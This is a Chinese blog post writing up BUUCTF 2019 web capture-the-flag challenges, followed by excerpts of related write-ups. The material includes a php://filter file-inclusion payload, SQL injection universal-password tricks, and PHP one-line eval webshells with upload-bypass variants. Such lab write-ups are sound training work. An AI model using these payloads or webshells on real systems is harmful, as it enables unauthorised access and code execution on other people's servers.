BUUCTF_极客大挑战 2019

最新推荐文章于 2025-06-02 22:12:55 发布
原创 最新推荐文章于 2025-06-02 22:12:55 发布 · 378 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文解析了EasySQL系列挑战,包括万能密码登录、源码分析、PHP伪协议使用及菜刀连接技巧,揭示了获取FLAG的详细过程。

EasySQL

进入题目,是一个登陆框,首先试一下万能密码,居然就这么登陆进去了🤣,获得flag。

flag

Havefun

进去之后,啥都没有,看下源码,构造cat=dog获得flag。

flag

Secret File

进入题目,看下源码,发现这个,访问。


接着访问action.php,但是一访问闪一下就里面换到了end.php

于是抓下包。

访问secr3t.php


根据提示访问flag.php

发现没有什么东西,于是用php伪协议读取flag.php的内容,构造payload。

file=php://filter/read=convert.base64-encode/resource=flag.php


对得到的内容base64解码,得到flag。

Knife

进入题目。

根据提示,直接用菜刀连接,连接成功,看一下目录,发现flag文件,访问,得到flag。

buuctf-web(极客挑战2019
qq_47804678的博客
02-08 439
于是用bp使用post方式,注意将user=0改成user=1(意思也就是:是cuit的学生为真。一开始我还改成了“cuit's students”。一共就两个页面,就都看一下,发现还有提示:必须是cuit的学生,还得写对密码。如果不加密直接返回的话,flag.php被解析后是看不到有flag的源文件的,所以只能加密然后用在线工具再进行解密得到源文件。bp抓包发现中间302跳转时给了另一个路径secr3t.php,尝试访问,F12找到隐藏的路径.Archive_romm.php,尝试访问,
BUUCTF [极客挑战 2019]Upload
m0_49025459的博客
05-12 6018
这题目是文件上传漏洞 看到这种上传的漏洞,肯定就是上传一句话木马,我们写一个正常的一句话木马先上传试试 <?php phpinfo(); @eval($_POST['shell']); ?> 我们上传之后,提示我们不是image格式,那么我们上传的时候就抓一下包,修改一下上传的格式 Content-Type: image/jpeg 放包 这时候我们发现,文件的后缀不能为php,文件绕过的格式也有很php,php3,php4,php5,phtml....
Buuctf极客挑战练习
qq_45927819的博客
08-03 612
文章目录[极客挑战 2019]Knife 1[极客挑战 2019]Http 1[极客挑战 2019]Upload 1[极客挑战 2019]PHP 1 [极客挑战 2019]Knife 1 白给的shell 一句话木马 直接蚁剑或者菜刀连接 在根目录下得到flag [极客挑战 2019]Http 1 打开环境查看源码发现Secret.php: 访问一下: 也就是这个网页不是来自https://www.Sycsecret.com的 抓包,添加referer头,referer头就是证明你从哪
BUUCTF[极客挑战 2019]BabySQL
网络空间安全学习
06-25 2480
通过输入非0数字,能正常回显,0和字母不能正常回显,什么都没有显示。刚刚我们输入非0数字正常回显,0和字母不能正常的回显,猜测说明sql语句当中可能存在||运算符,只有输入非0数字,才会返回true,回显条件。可观察网页的源码信息,发现有check.php,猜测可能是登录界面时,输入账号和密码的跳转界面,提示信息。通过上面的过程我们不难发现,此时还存在过滤,from和where也被过滤,同理双写绕过。拿到该靶机,观察界面,存在登录说明存在可能SQL注入,根据题目也可得知存在SQL注入。
BUUCTF-极客挑战2019
Atkx's Blog
01-27 828
[极客挑战2019]Http [极客挑战2019]upload 将里面的内容改为一句话木马 GIF89a <script language="php">eval($_POST['shell']);</script> /upload/test.phtml [极客挑战2019]PHP 访问靶机地址 提到了备份网站,直接访问www.zip文件,flag.php里面有个假的flag 查看一下index.php,发现要用get方式提交参数select 再查看class.php
BUUCTF_[极客挑战 2019]Http解题思路
时光不老的博客
01-10 718
[极客挑战 2019]Http
BUUCTF[极客挑战 2019]Secret File 1题解
2301_79896143的博客
06-02 1106
题目"Secret File 1"考察文件包含漏洞,通过分析网页源码发现隐藏入口Archive_room.php,利用BurpSuite拦截重定向后访问secr3t.php。该页面存在文件包含漏洞,但过滤了常用payload构造方式。最终使用php://filter协议绕过过滤,成功读取flag.php的base64编码内容,解码后获得flag。解题过程涉及源码分析、抓包工具使用和文件包含漏洞利用技巧。
BUUCTF__[极客挑战 2019]EasySQL_题解
风过江南乱的博客
05-16 6330
一、前言 这几天一直在研究搭建CTFd,最终还是没成功(成功了一次汉化失败),各种报错,真的崩溃了,时间也不算浪费了吧,也学到了一点东西。 因为对 Linux 操作系统不是很熟悉,特别是都是命令行。 再研究研究下次继续。 二、看题 很明显的sql注入题了,习惯F12也没发现什么问题。 还是先尝试闭合方式, 输入1、1’、1" 判断,当输入 1’ 报错,结果语句应该为单引号闭合。 都报错了,尝试注入 ,然后,了解一下万能用户名 / 密码。 三、研究 select * from table_na
buuctf [极客挑战 2019]Http1
weixin_61060664的博客
11-13 3541
buuctf刷题过程,我是菜鸡,有问题就是你对
BUUCTF__[极客挑战 2019]LoveSQL_题解
风过江南乱的博客
06-19 1517
前言 很好,考完了死亡高数和物,虽然还没考完,不过艰难的已经过去了,感觉神清气爽,水一题。 u1s1,线上考试=在海里考试。 读题 嗯,还是熟悉的背景图,好几题都是这个师傅出的sql注入。 首先很容易试出为单引号字符型闭合,输入 1、1"、1’ , 在1’时报错 然后尝试注入,发现,好像没有过滤,连 union 联合注入都能使用,并且很容易得到数据库名称,得到数据库名称geek 但在此之前,先得到列数为3,不是3则提示报错 然后,基本操作得到表信息,有两个表geekuser和l0ve1ysq
BUUCTF[极客挑战 2019]Havefun
GUOGUO的博客
04-19 347
BUUCTF[极客挑战 2019]Havefun 一进去之后看到如下页面: 是猫猫晃动着尾巴,可爱~ 好了,言归正传:直接查看源代码,向下翻,看到: 那么这个题就很简单了,分析代码得知,我们传入一个cat的参数,其名为dog就可以了 构造payload: ?cat=dog 得到flag: 得到flag: ![QQ截图20220419001328](https://img-blog.csdnimg.cn/img_convert/3424b2f0b20bc90c9544339fa287987c.png)
BUUCTF——[极客挑战 2019]PHP
doraemon12345的博客
06-07 548
打开题目,页面上显示说习惯备份,尝试下载备份www.zip,下载后打开查看 flag文件里并不是flag,查看其他的在class文件中发现代码,应该是让我们反序列化,给出源代码 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct(
BUUCTF [极客挑战 2019]PHP 1
weixin_45642610的博客
01-14 6538
BUUCTF [极客挑战 2019]PHP 1-刷题日记 进去后是这样: 提示备份,用dirsearch或dirmap扫出来(怎么安装上网找,很多教程,实在不会可以问我(除了dirmap))。搜个字典下载,自带的字典很少。 py3 dir.py -u http://3c25afd0-8c4a-4832-8e11-f182ffcccae4.node3.buuoj.cn/ -e * -w db/dir.txt -u+地址 -e选择语言 -w选择字典 要多试几次,有时扫不出来,真的坑。(御剑更坑!) 输
Buuctf-[极客挑战 2019]HardSQL
m0_63563528的博客
04-13 366
的,任何可以计算出结果的语句都可以用括号围起来,而括号的两端,可以没有多余的空格。我们知道,出现这个说明闭合成功了,但是之后发现它过滤了好多字符和语句,我输入。拼接一下flag,把重复部分删咯,就可以成功提交。又得到了:98-8e23-3728c2f96a1d}报错注入回显嘛,直接获取数据库名“geek”空格被过滤了 ,怎样绕过呢?我来试一下:输入1'(or)#
BUUCTF[极客挑战 2019] EasySQL 1
m0_75178803的博客
06-12 5760
因为这道题是基于sql单引号的注入,我们构造万能密码,#在sql注入中是注释符。题目来源:BUUCTF [极客挑战 2019] EasySQL 1。用or连接,因为1=1恒真,假或真=真,真或真=真,所以这个语句恒成立。输入 1' union select 1,2,3。查看报错信息发现是基于单引号的注入。由一道题简单引出万能密码的知识点。这是查询数据库可能会用到的句型。只有当输入1’时,页面报错。直接在用户名或者密码区输入。只有当列名字段数为3时,
BUUCTF [极客挑战 2019]Havefun
m0_49025459的博客
04-11 495
题目 看看题奥。啥也没有 直接看看源代码 <html> <head> <meta charset="utf-8"> <title>一起来撸猫</title> <style> @keyframes tail { 6.6666666667% { transform: rotate(0); } 10% { transform: rotate(10deg); } 16.6666666667% .
BUUCTF:[极客挑战 2019]Havefun
Yu3511606536的博客
07-22 482
[BUUCTF][极客挑战 2019]Havefun
BUUCTF】[极客挑战 2019]LoveSQL1writeup
GZWZ_的博客
05-04 1222
easysql
BUUCTF---[极客挑战 2019]BuyFlag1
2201_75556700的博客
03-05 821
7.抓包之后Cookie这里显示用户为0,想到刚刚第一个提示我们必须是哪哪的学生,可能和这个用户有关,接下来,把0改为1,修改完之后发现我们的身份和密码是正确的。5.接下来利用工具hackbar,涉及到弱类型比较,只要保证password的前三个数字和404一样,就可以,但是不能全是数字。8.试着把money也作为一个参数传值,输入正确的值之后提示我们输入的数值长度太了,试着修改小了,发现也不行。4.第一个提示告诉我们,如果想要买flag的话我们必须是来自cuit的学生并且要输入正确的密码。
buuctf web 极客挑战2019 lovesql
最新发布
07-09
BUUCTF Web 极客挑战 2019 的 *LoveSQL* 题目中,这是一道典型的 SQL 注入练习题。题目要求通过注入点获取 flag,并考验了对 SQL 注入的多个阶段的理解与实践能力。 ### 解题思路 首先访问靶机页面后,发现是...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值